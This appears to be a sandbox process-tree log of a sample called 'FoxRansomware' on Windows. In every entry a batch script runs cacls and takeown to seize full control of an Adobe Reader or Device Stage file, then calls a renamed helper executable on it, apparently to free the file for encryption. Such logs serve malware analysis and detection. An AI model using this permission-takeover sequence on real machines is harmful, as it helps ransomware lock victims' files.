- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini""
  2⤵
  PID:3324
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini" /E /G Admin:F /C
    3⤵
    PID:3468
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini"
    3⤵
    PID:2720
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "eula.ini" -nobanner
    3⤵
    PID:3460
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "eula.ini" -nobanner
      4⤵
      PID:3368
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1628
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc""
  2⤵
  PID:2092
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc" /E /G Admin:F /C
    3⤵
    PID:220
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc"
    3⤵
    PID:3424
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "AcroSign.prc" -nobanner
    3⤵
    PID:3244
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "AcroSign.prc" -nobanner
      4⤵
      PID:3208
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:208
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif""
  2⤵
  PID:4088
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif" /E /G Admin:F /C
    3⤵
    PID:992
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif"
    3⤵
    PID:4160
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "bl.gif" -nobanner
    3⤵
    PID:2368
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "bl.gif" -nobanner
      4⤵
      PID:3320
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:216
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif""
  2⤵
  PID:3912
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif" /E /G Admin:F /C
    3⤵
    PID:112
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif"
    3⤵
    - Modifies file permissions
    PID:2004
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "forms_super.gif" -nobanner
    3⤵
    PID:3632
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "forms_super.gif" -nobanner
      4⤵
      PID:3472
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4228
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif""
  2⤵
  PID:2076
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif" /E /G Admin:F /C
    3⤵
    PID:3960
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif"
    3⤵
    PID:3704
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "review_browser.gif" -nobanner
    3⤵
    PID:3692
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "review_browser.gif" -nobanner
      4⤵
      PID:2768
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:912
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif""
  2⤵
  PID:4184
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif" /E /G Admin:F /C
    3⤵
    PID:4128
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif"
    3⤵
    PID:3304
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "tl.gif" -nobanner
    3⤵
    PID:3660
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "tl.gif" -nobanner
      4⤵
      PID:1992
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3680
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-V""
  2⤵
  PID:1488
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-V" /E /G Admin:F /C
    3⤵
    PID:3616
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-V"
    3⤵
    PID:1620
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "Identity-V" -nobanner
    3⤵
    PID:3060
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "Identity-V" -nobanner
      4⤵
      PID:1708
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1652
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf""
  2⤵
  PID:3316
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf" /E /G Admin:F /C
    3⤵
    PID:3040
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf"
    3⤵
    PID:4248
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "MyriadPro-Bold.otf" -nobanner
    3⤵
    PID:4164
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "MyriadPro-Bold.otf" -nobanner
      4⤵
      PID:4756
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3720
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\SC_Reader.exe""
  2⤵
  PID:3776
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\SC_Reader.exe" /E /G Admin:F /C
    3⤵
    PID:356
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\SC_Reader.exe"
    3⤵
    - Modifies file permissions
    PID:4892
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "SC_Reader.exe" -nobanner
    3⤵
    PID:4408
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "SC_Reader.exe" -nobanner
      4⤵
      PID:4628
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4616
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt55.ths""
  2⤵
  PID:4696
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt55.ths" /E /G Admin:F /C
    3⤵
    PID:4652
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt55.ths"
    3⤵
    PID:4484
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "brt55.ths" -nobanner
    3⤵
    PID:4608
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "brt55.ths" -nobanner
      4⤵
      PID:4688
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4632
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.hsp""
  2⤵
  PID:4412
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.hsp" /E /G Admin:F /C
    3⤵
    PID:4288
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.hsp"
    3⤵
    PID:4448
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "usa03.hsp" -nobanner
    3⤵
    PID:4680
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "usa03.hsp" -nobanner
      4⤵
      PID:4708
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4844
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CYRILLIC.TXT""
  2⤵
  PID:4700
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CYRILLIC.TXT" /E /G Admin:F /C
    3⤵
    PID:1904
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CYRILLIC.TXT"
    3⤵
    PID:4784
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "CYRILLIC.TXT" -nobanner
    3⤵
    PID:4656
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "CYRILLIC.TXT" -nobanner
      4⤵
      PID:4304
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4812
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1252.TXT""
  2⤵
  PID:4924
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1252.TXT" /E /G Admin:F /C
    3⤵
    PID:4796
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1252.TXT"
    3⤵
    PID:4908
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "CP1252.TXT" -nobanner
    3⤵
    PID:4312
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "CP1252.TXT" -nobanner
      4⤵
      PID:4536
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4336
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png""
  2⤵
  PID:4492
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png" /E /G Admin:F /C
    3⤵
    PID:4520
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png"
    3⤵
    PID:4516
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "background.png" -nobanner
    3⤵
    PID:4348
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "background.png" -nobanner
      4⤵
      PID:4360
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4548
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml""
  2⤵
  PID:3532
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml" /E /G Admin:F /C
    3⤵
    PID:4964
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml"
    3⤵
    PID:4720
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:4716
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:4364
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4540
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml""
  2⤵
  PID:5100
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml" /E /G Admin:F /C
    3⤵
    PID:5048
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml"
    3⤵
    - Modifies file permissions
    PID:5040
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:4528
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:2516
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4572
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif""
  2⤵
  PID:3408
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif" /E /G Admin:F /C
    3⤵
    PID:4952
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif"
    3⤵
    PID:2164
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "forms_distributed.gif" -nobanner
    3⤵
    PID:4948
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "forms_distributed.gif" -nobanner
      4⤵
      PID:5112
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1944
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif""
  2⤵
  PID:1436
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif" /E /G Admin:F /C
    3⤵
    PID:2640
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif"
    3⤵
    - Modifies file permissions
    PID:3336
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "reviews_sent.gif" -nobanner
    3⤵
    PID:4568
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "reviews_sent.gif" -nobanner
      4⤵
      PID:3848
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5096
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif""
  2⤵
  PID:1704
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif" /E /G Admin:F /C
    3⤵
    PID:3816
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif"
    3⤵
    - Modifies file permissions
    PID:3748
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "stop_collection_data.gif" -nobanner
    3⤵
    PID:3880
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "stop_collection_data.gif" -nobanner
      4⤵
      PID:4876
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1132
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm""
  2⤵
  PID:3972
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm" /E /G Admin:F /C
    3⤵
    PID:3980
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm"
    3⤵
    - Modifies file permissions
    PID:4072
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "ReadMe.htm" -nobanner
    3⤵
    PID:4028
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "ReadMe.htm" -nobanner
      4⤵
      PID:4940
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2404
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf""
  2⤵
  PID:1860
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf" /E /G Admin:F /C
    3⤵
    PID:5024
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf"
    3⤵
    PID:2932
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "MinionPro-It.otf" -nobanner
    3⤵
    PID:1796
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "MinionPro-It.otf" -nobanner
      4⤵
      PID:776
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3560
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB""
  2⤵
  PID:2600
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB" /E /G Admin:F /C
    3⤵
    PID:3520
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB"
    3⤵
    PID:1612
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "ZX______.PFB" -nobanner
    3⤵
    PID:2400
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "ZX______.PFB" -nobanner
      4⤵
      PID:4012
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1536
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp""
  2⤵
  PID:524
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp" /E /G Admin:F /C
    3⤵
    PID:2800
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp"
    3⤵
    - Modifies file permissions
    PID:1452
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "brt04.hsp" -nobanner
    3⤵
    PID:1404
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "brt04.hsp" -nobanner
      4⤵
      PID:1248
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3192
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env""
  2⤵
  PID:3340
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env" /E /G Admin:F /C
    3⤵
    PID:1952
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env"
    3⤵
    PID:1900
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "engphon.env" -nobanner
    3⤵
    PID:2492
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "engphon.env" -nobanner
      4⤵
      PID:1572
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:328
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT""
  2⤵
  PID:3064
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT" /E /G Admin:F /C
    3⤵
    PID:3608
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT"
    3⤵
    PID:3908
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "CORPCHAR.TXT" -nobanner
    3⤵
    PID:3604
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "CORPCHAR.TXT" -nobanner
      4⤵
      PID:2260
